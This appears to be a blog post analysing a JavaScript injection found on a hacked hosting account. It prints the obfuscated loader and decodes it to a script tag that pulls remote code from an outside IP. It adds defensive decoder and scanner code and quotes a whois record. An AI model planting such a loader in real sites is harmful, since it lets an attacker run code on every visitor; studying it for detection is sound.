Uh ohz you got haxored!

So a friend came to me today with a problem he was having and wasn’t sure what to do about…

Almost EVERY page on his webserver was going to a blank white page, or a page that was NOT what was intended to be viewed.

After looking into things, I realized we may have some foul play on our hands!

So somehow, this line of code was being inserted into almost every page on his entire hosting account.

<script language=javascript><!--
document.write(unescape('%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl61Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXszAnczAnrHY8iprLtzAn%3E').replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,""));--></script>

Hmmmmmmmmmmmmm…..

My first clue was that the code uses the JavaScript function unescape, which percent-decodes an encoded string of text (every %XX pair becomes the character with that hex code, so %3C becomes "<").

If you take the encoded string and run it through a URL decoder (which does the same job unescape does in the browser), we end up with this:

<script language=javascript><!-- document.write(unescape('<GXscrLrGXirLpt VhsrcrL=Sn/HY8/78HY8.GX1GX1Cl60.Cl61Cl67Cl65Cl6.24Vh9zAn/Cl6jquVheHY8rrLyCl6.jSns>GX</GXszAnczAnrHY8iprLtzAn>').replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,"")); --></script>

Next you can see at the end they are using JavaScript's replace method, which does just what it says: it finds every piece of text matching a pattern and swaps it for something else. With this particular piece of code the regular expression /Cl6|HY8|zAn|Sn|rL|Vh|GX/g matches any of the seven junk tokens Cl6, HY8, zAn, Sn, rL, Vh and GX wherever they appear (the g flag means every occurrence, not just the first) and replaces each one with an empty string, essentially just removing them. The junk was sprinkled into the decoded text so that a simple search for "script src" or the IP address would not find it.

Once you remove those characters you end up with:

<script src=//78.110.175.249/jquery.js></script>

Doing a whois on that IP reveals:

person:         Alexander A Solovyov
address:        LIMT Group Ltd.
address:        Karpinskogo 97a
address:        Moscow
address:        111423
address:        Russian Federation
phone:          +7 342 2763167
e-mail:         [email protected]
e-mail:         [email protected]
e-mail:         [email protected]

Sooooo it looks as if Mr. Solovyov has been inserting this piece of code into my friend's pages. Doing a simple Google search for 78.110.175.249 or Alexander A Solovyov reveals that this guy enjoys doing this sort of thing.

Well, if you go to 78.110.175.249/jquery.js you will see that it APPEARS to be a jQuery file… HOWEVER… this is NOT what it is.

There is actually a hidden payload inside the copy of the jQuery library he serves, which pulls in MORE escaped code from:

http://78.110.175.249/cp/?N

which looks like this:

_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i+"_");if(d)d.src=""}eval(unescape('~/`/~%4A~%75@%73t %66!u#c%6B%20@%6F@f~f%2E%2E%2E!?%3Cd@i#%76 %73$%74@%79%6C$e=#%64%69s%70`l%61y!:`%6E#o%6Ee~%3E|\n`va#r# t@%3Dn~e%77 @%44a@t%65|(%312!3%37|0`1%3759!2#0`%30$0`%29;#d$%6F`%63u`%6D!e|n|%74.~c!%6F%6F%6B%69e%3D%22h%67f%74=%31;` |e|xpi%72%65s~%3D"%2B~t.%74%6F!G~%4D~%54@%53%74r$i#%6E$g!%28)~+#%22`; ~pa%74|%68=/@%22@%3B\n@%2F%2F$%3C%2F`d|%69v%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));

If we deobfuscate this code the same way as before (unescape first, then strip every character matched by the replace, which here is @ ! ~ ? # $ ` and |, and then look at what eval would have run) we end up with:

//Just fuck off...<div style=display:none>
var t=new Date(1229972812000);document.cookie="hgft=1; expires="+t.toGMTString()+"; path=/";
//</div>

Which simply says “Just fuck off…” (inside a JavaScript comment and a hidden div, so nothing is visible on the page) and then sets a cookie named hgft with a fixed expiry date. The short loop in front of the eval just blanks the src of any elements with ids _0_ through _8_ if they exist.
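Both decoding walkthroughs above (the page loader with its seven junk tokens, and the second-stage payload from /cp/?N with its junk punctuation) can be done statically, without ever handing anything to eval or document.write. The following is an added example, not code from the original post: a small Node.js script that re-implements unescape, decodes both strings exactly as copied from the post, and pulls out the script src and the cookie write so the effect can be read off. The helper names (legacyUnescape, decodeLayeredPayload, extractScriptSrc, extractCookieWrites) are my own; the expiry timestamp inside the Date() call comes from the served payload and is treated as opaque here.

```javascript
// Added example (not from the original post): decode the two obfuscation
// layers statically. Layer 1 is the legacy unescape() (percent-decoding);
// layer 2 is String.prototype.replace() with a regex that deletes the junk
// tokens sprinkled through the decoded text.

// Re-implementation of the legacy unescape(): %XX -> one code unit,
// %uXXXX -> one UTF-16 code unit, anything else left untouched. Written out
// so the decoder does not depend on the host providing the deprecated global.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_m, u4, h2) => String.fromCharCode(parseInt(u4 !== undefined ? u4 : h2, 16)));
}

// Generic decoder for the pattern unescape('<encoded>').replace(/<junk>/g, "").
function decodeLayeredPayload(encoded, junkRegex) {
  return legacyUnescape(encoded).replace(junkRegex, '');
}

// Stage 1: the loader injected into the pages (string and regex copied from the post).
const STAGE1_ENCODED = '%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl61Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXszAnczAnrHY8iprLtzAn%3E';
const STAGE1_JUNK = /Cl6|HY8|zAn|Sn|rL|Vh|GX/g;

// Stage 2: what /cp/?N served, copied from the post. The \n sequences are JS
// string escapes here, exactly as they were inside the eval'd literal.
const STAGE2_ENCODED = '~/`/~%4A~%75@%73t %66!u#c%6B%20@%6F@f~f%2E%2E%2E!?%3Cd@i#%76 %73$%74@%79%6C$e=#%64%69s%70`l%61y!:`%6E#o%6Ee~%3E|\n`va#r# t@%3Dn~e%77 @%44a@t%65|(%312!3%37|0`1%3759!2#0`%30$0`%29;#d$%6F`%63u`%6D!e|n|%74.~c!%6F%6F%6B%69e%3D%22h%67f%74=%31;` |e|xpi%72%65s~%3D"%2B~t.%74%6F!G~%4D~%54@%53%74r$i#%6E$g!%28)~+#%22`; ~pa%74|%68=/@%22@%3B\n@%2F%2F$%3C%2F`d|%69v%3E';
const STAGE2_JUNK = /@|\!|~|\?|#|\$|`|\|/g;

function decodeStage1() { return decodeLayeredPayload(STAGE1_ENCODED, STAGE1_JUNK); }
function decodeStage2() { return decodeLayeredPayload(STAGE2_ENCODED, STAGE2_JUNK); }

// Pull the src attribute out of a decoded <script> tag; null if there is none.
function extractScriptSrc(html) {
  const m = /<script[^>]*\ssrc\s*=\s*["']?([^"'\s>]+)/i.exec(html);
  return m ? m[1] : null;
}

// List every document.cookie assignment in decoded code (the right-hand side
// up to the statement's terminating ';'), so the effect is visible without running it.
function extractCookieWrites(code) {
  return [...code.matchAll(/document\.cookie\s*=\s*(.+?);(?:\n|$)/g)].map(m => m[1].trim());
}

// Usage: node decode.js
console.log('stage 1:', decodeStage1());
console.log('loads   :', extractScriptSrc(decodeStage1()));
console.log('stage 2:\n' + decodeStage2());
console.log('cookies :', extractCookieWrites(decodeStage2()));
```

Because the decoder never evaluates anything, it can be pointed at other samples of this loader family by swapping in the encoded string and the junk regex; everything else in the pipeline is the same two operations the injected code performs.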

This payload luckily was not doing anything malicious, but it COULD in the future (or could have in the past). Because every page now loads a script from a server he controls, he can change that code on his webserver to do whatever he wants, to every visitor, whenever he wants, without touching my friend's account again.

After digging a bit more, I realized that my friend's personal computer was infected with a trojan, and the attacker had most likely obtained his webserver account login from it and accessed the account that way.
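Cleaning up after this means finding every file that still carries the loader, not just the pages someone happened to open, and doing it again after the password is changed to make sure nothing was re-planted. Added example, not code from the original post: a Node.js scanner that walks a web root and flags (1) the document.write(unescape('…').replace(/…/g,"")) shape the loader uses and (2) any <script src> pointing at a bare IP address, which is what the decoded loader resolved to. The file extensions, the constructed sample page and the function names are my own choices; the IP in the sample is the one named in the post.

```javascript
// Added example (not from the original post): locate injected loaders across a
// web root. Two indicators are checked per file:
//  1. document.write(unescape('...').replace(/junk|tokens/g,"")), the
//     encode-then-strip pattern used by the injection described in the post;
//  2. a <script src=...> whose host is a bare IPv4 address, which is what the
//     decoded loader turned out to be.

// Loader shape: document.write(unescape('<encoded>').replace(/<alternation>/g,"")).
// The encoded string itself never contains quotes, so [^'"]* is enough here.
const WRITE_UNESCAPE_RE =
  /document\.write\s*\(\s*unescape\s*\(\s*(['"])([^'"]*)\1\s*\)\s*\.replace\s*\(\s*\/([^/]+)\/g\s*,\s*(['"])\4\s*\)\s*\)/g;
// <script src=//1.2.3.4/... or http(s)://1.2.3.4/...
const IP_SCRIPT_SRC_RE =
  /<script[^>]*\ssrc\s*=\s*["']?((?:https?:)?\/\/(?:\d{1,3}\.){3}\d{1,3}[^"'\s>]*)/gi;

// 1-based line number of a character offset, for readable reports.
function lineOf(text, index) {
  return text.slice(0, index).split('\n').length;
}

// Scan one file's contents; returns [{file, line, kind, detail}, ...].
function scanContent(text, file = '<string>') {
  const findings = [];
  for (const m of text.matchAll(WRITE_UNESCAPE_RE)) {
    findings.push({ file, line: lineOf(text, m.index),
      kind: 'write-unescape-replace', detail: 'strips /' + m[3] + '/' });
  }
  for (const m of text.matchAll(IP_SCRIPT_SRC_RE)) {
    findings.push({ file, line: lineOf(text, m.index), kind: 'script-src-ip', detail: m[1] });
  }
  return findings;
}

// Recursively scan every file with one of the given extensions under root.
function scanDirectory(root, exts = ['.html', '.htm', '.php', '.js', '.tpl']) {
  const fs = require('fs');
  const path = require('path');
  const out = [];
  for (const entry of fs.readdirSync(root, { withFileTypes: true })) {
    const full = path.join(root, entry.name);
    if (entry.isDirectory()) out.push(...scanDirectory(full, exts));
    else if (exts.includes(path.extname(entry.name).toLowerCase()))
      out.push(...scanContent(fs.readFileSync(full, 'utf8'), full));
  }
  return out;
}

// Constructed sample page (not a real capture): line 3 carries a loader in the
// post's shape, line 5 the decoded form, line 6 a legitimate CDN include.
const SAMPLE_PAGE = [
  '<html><head><title>constructed sample page</title>',
  '<script language=javascript><!--',
  "document.write(unescape('%3Cscr%69pt%3E').replace(/XX|YY/g,\"\"));--></script>",
  '</head><body>',
  '<script src=//78.110.175.249/jquery.js></script>',
  '<script src="https://code.jquery.com/jquery.js"></script>',
  '</body></html>',
].join('\n');

// Usage: node scan.js /path/to/webroot   (no argument: scans the sample page)
if (typeof require !== 'undefined' && require.main === module) {
  const root = process.argv[2];
  const findings = root ? scanDirectory(root) : scanContent(SAMPLE_PAGE, 'sample.html');
  for (const f of findings) console.log(`${f.file}:${f.line} ${f.kind} ${f.detail}`);
  if (findings.length === 0) console.log('no injected loaders found');
}
```

The two indicators are deliberately narrow, so a clean report means only that this particular loader family is gone; a scan that comes back empty the day after the hosting password and the infected PC have been dealt with is the useful signal, since a re-appearance would mean the credentials are still in the attacker's hands.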

I figured I would post this little “attack case study” to give anyone interested some insight on a simple attack.  The best way to learn how to prevent these things is to be aware of them.

If you have ever been “hacked” or had your system exploited, leave a comment and let me know what you did to fix the situation, I’m curious to hear if many others have fallen prey like my friend did!